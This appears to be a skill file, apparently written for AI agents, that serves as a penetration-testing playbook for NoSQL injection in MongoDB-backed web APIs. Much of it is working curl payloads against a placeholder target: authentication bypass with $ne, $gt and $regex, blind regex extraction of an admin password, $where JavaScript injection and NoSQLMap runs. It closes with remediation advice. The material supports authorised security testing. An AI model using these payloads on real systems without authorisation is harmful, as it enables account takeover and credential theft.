mirror of
https://github.com/mukul975/Anthropic-Cybersecurity-Skills.git
synced 2026-07-17 13:15:16 +03:00
200 lines
7.9 KiB
Markdown
200 lines
7.9 KiB
Markdown
---
|
|
name: exploiting-nosql-injection-vulnerabilities
|
|
description: Detect and exploit NoSQL injection vulnerabilities in MongoDB, CouchDB, and other NoSQL databases to demonstrate authentication bypass, data extraction, and unauthorized access risks.
|
|
domain: cybersecurity
|
|
subdomain: web-application-security
|
|
tags: [nosql-injection, mongodb, authentication-bypass, injection-attack, web-security, database-security, api-testing]
|
|
version: "1.0"
|
|
author: mahipal
|
|
license: Apache-2.0
|
|
---
|
|
|
|
# Exploiting NoSQL Injection Vulnerabilities
|
|
|
|
## When to Use
|
|
- During web application penetration testing of applications using NoSQL databases
|
|
- When testing authentication mechanisms backed by MongoDB or similar databases
|
|
- When assessing APIs that accept JSON input for database queries
|
|
- During bug bounty hunting on applications with NoSQL backends
|
|
- When performing security code review of database query construction
|
|
|
|
## Prerequisites
|
|
- Burp Suite Professional or Community Edition with JSON support
|
|
- NoSQLMap tool installed (`pip install nosqlmap` or from GitHub)
|
|
- Understanding of MongoDB query operators ($ne, $gt, $regex, $where, $exists)
|
|
- Target application using a NoSQL database (MongoDB, CouchDB, Cassandra)
|
|
- Proxy configured for HTTP traffic interception
|
|
- Python 3.x for custom payload scripting
|
|
|
|
## Workflow
|
|
|
|
### Step 1 — Identify NoSQL Injection Points
|
|
```bash
|
|
# Look for JSON-based login forms or API endpoints
|
|
# Common indicators: application accepts JSON POST bodies, uses MongoDB
|
|
# Test with basic syntax-breaking characters
|
|
curl -X POST http://target.com/api/login \
|
|
-H "Content-Type: application/json" \
|
|
-d '{"username": "admin\"", "password": "test"}'
|
|
|
|
# Test for operator injection in query parameters
|
|
curl "http://target.com/api/users?username[$ne]=invalid"
|
|
|
|
# Check for error-based detection
|
|
curl -X POST http://target.com/api/search \
|
|
-H "Content-Type: application/json" \
|
|
-d '{"query": {"$gt": ""}}'
|
|
```
|
|
|
|
### Step 2 — Perform Authentication Bypass
|
|
```bash
|
|
# Basic authentication bypass with $ne operator
|
|
curl -X POST http://target.com/api/login \
|
|
-H "Content-Type: application/json" \
|
|
-d '{"username": {"$ne": "invalid"}, "password": {"$ne": "invalid"}}'
|
|
|
|
# Bypass with $gt operator
|
|
curl -X POST http://target.com/api/login \
|
|
-H "Content-Type: application/json" \
|
|
-d '{"username": {"$gt": ""}, "password": {"$gt": ""}}'
|
|
|
|
# Target specific user with regex
|
|
curl -X POST http://target.com/api/login \
|
|
-H "Content-Type: application/json" \
|
|
-d '{"username": "admin", "password": {"$regex": ".*"}}'
|
|
|
|
# Bypass using $exists operator
|
|
curl -X POST http://target.com/api/login \
|
|
-H "Content-Type: application/json" \
|
|
-d '{"username": {"$exists": true}, "password": {"$exists": true}}'
|
|
```
|
|
|
|
### Step 3 — Extract Data Using Boolean-Based Blind Injection
|
|
```bash
|
|
# Extract username character by character using $regex
|
|
# Test if first character of admin password is 'a'
|
|
curl -X POST http://target.com/api/login \
|
|
-H "Content-Type: application/json" \
|
|
-d '{"username": "admin", "password": {"$regex": "^a"}}'
|
|
|
|
# Test if first two characters are 'ab'
|
|
curl -X POST http://target.com/api/login \
|
|
-H "Content-Type: application/json" \
|
|
-d '{"username": "admin", "password": {"$regex": "^ab"}}'
|
|
|
|
# Enumerate usernames with regex
|
|
curl -X POST http://target.com/api/login \
|
|
-H "Content-Type: application/json" \
|
|
-d '{"username": {"$regex": "^adm"}, "password": {"$ne": "invalid"}}'
|
|
```
|
|
|
|
### Step 4 — Exploit JavaScript Injection via $where
|
|
```bash
|
|
# JavaScript injection through $where operator
|
|
curl -X POST http://target.com/api/search \
|
|
-H "Content-Type: application/json" \
|
|
-d '{"$where": "this.username == \"admin\""}'
|
|
|
|
# Time-based detection with sleep
|
|
curl -X POST http://target.com/api/search \
|
|
-H "Content-Type: application/json" \
|
|
-d '{"$where": "sleep(5000) || this.username == \"admin\""}'
|
|
|
|
# Data exfiltration via $where with string comparison
|
|
curl -X POST http://target.com/api/search \
|
|
-H "Content-Type: application/json" \
|
|
-d '{"$where": "this.password.match(/^a/) != null"}'
|
|
```
|
|
|
|
### Step 5 — Use NoSQLMap for Automated Testing
|
|
```bash
|
|
# Clone and setup NoSQLMap
|
|
git clone https://github.com/codingo/NoSQLMap.git
|
|
cd NoSQLMap
|
|
python setup.py install
|
|
|
|
# Run NoSQLMap against target
|
|
python nosqlmap.py -u http://target.com/api/login \
|
|
--method POST \
|
|
--data '{"username":"test","password":"test"}'
|
|
|
|
# Alternative: use nosqli scanner
|
|
pip install nosqli
|
|
nosqli scan -t http://target.com/api/login -d '{"username":"*","password":"*"}'
|
|
```
|
|
|
|
### Step 6 — Test URL Parameter Injection
|
|
```bash
|
|
# Parameter-based injection (GET requests)
|
|
curl "http://target.com/api/users?username[$ne]=&password[$ne]="
|
|
curl "http://target.com/api/users?username[$regex]=admin&password[$gt]="
|
|
curl "http://target.com/api/users?username[$exists]=true"
|
|
|
|
# Array injection via URL parameters
|
|
curl "http://target.com/api/users?username[$in][]=admin&username[$in][]=root"
|
|
|
|
# Inject via HTTP headers if processed by backend
|
|
curl http://target.com/api/profile \
|
|
-H "X-User-Id: {'\$ne': null}"
|
|
```
|
|
|
|
## Key Concepts
|
|
|
|
| Concept | Description |
|
|
|---------|-------------|
|
|
| Operator Injection | Injecting MongoDB operators ($ne, $gt, $regex) into query parameters |
|
|
| Authentication Bypass | Using operators to match any document and bypass login checks |
|
|
| Blind Extraction | Character-by-character data extraction using $regex boolean responses |
|
|
| $where Injection | Executing arbitrary JavaScript on the MongoDB server via $where operator |
|
|
| Type Juggling | Exploiting how NoSQL databases handle different input types (string vs object) |
|
|
| BSON Injection | Manipulating Binary JSON serialization in MongoDB wire protocol |
|
|
| Server-Side JS | JavaScript execution context available in MongoDB for query evaluation |
|
|
|
|
## Tools & Systems
|
|
|
|
| Tool | Purpose |
|
|
|------|---------|
|
|
| NoSQLMap | Automated NoSQL injection detection and exploitation framework |
|
|
| Burp Suite | HTTP proxy for intercepting and modifying JSON requests |
|
|
| MongoDB Shell | Direct database interaction for testing query behavior |
|
|
| nosqli | Dedicated NoSQL injection scanner and exploitation tool |
|
|
| PayloadsAllTheThings | Curated NoSQL injection payload repository |
|
|
| Nuclei | Template-based scanner with NoSQL injection detection templates |
|
|
| Postman | API testing platform for crafting NoSQL injection requests |
|
|
|
|
## Common Scenarios
|
|
|
|
1. **Login Bypass** — Bypass MongoDB-backed authentication using `{"$ne": ""}` operator injection in username and password fields
|
|
2. **Data Enumeration** — Extract database contents character by character using `$regex` blind injection when no direct output is visible
|
|
3. **Privilege Escalation** — Modify user role fields through NoSQL injection in profile update endpoints
|
|
4. **API Key Extraction** — Extract API keys or tokens stored in MongoDB collections through boolean-based blind techniques
|
|
5. **Account Takeover** — Enumerate valid usernames via regex injection then brute-force passwords through operator-based authentication bypass
|
|
|
|
## Output Format
|
|
|
|
```
|
|
## NoSQL Injection Assessment Report
|
|
- **Target**: http://target.com/api/login
|
|
- **Database**: MongoDB 6.0
|
|
- **Vulnerability Type**: Operator Injection (Authentication Bypass)
|
|
- **Severity**: Critical (CVSS 9.8)
|
|
|
|
### Vulnerable Parameters
|
|
| Endpoint | Parameter | Injection Type | Impact |
|
|
|----------|-----------|---------------|--------|
|
|
| POST /api/login | username | Operator ($ne) | Auth Bypass |
|
|
| POST /api/login | password | Regex ($regex) | Data Extraction |
|
|
| GET /api/users | id | $where JS Injection | RCE Potential |
|
|
|
|
### Proof of Concept
|
|
- Authentication bypass achieved with: {"username":{"$ne":""},"password":{"$ne":""}}
|
|
- Extracted 3 admin passwords via blind regex injection
|
|
- JavaScript execution confirmed via $where operator
|
|
|
|
### Remediation
|
|
- Use parameterized queries with MongoDB driver sanitization
|
|
- Implement input type validation (reject objects where strings expected)
|
|
- Disable server-side JavaScript execution ($where) in MongoDB config
|
|
- Apply least-privilege database access controls
|
|
```
|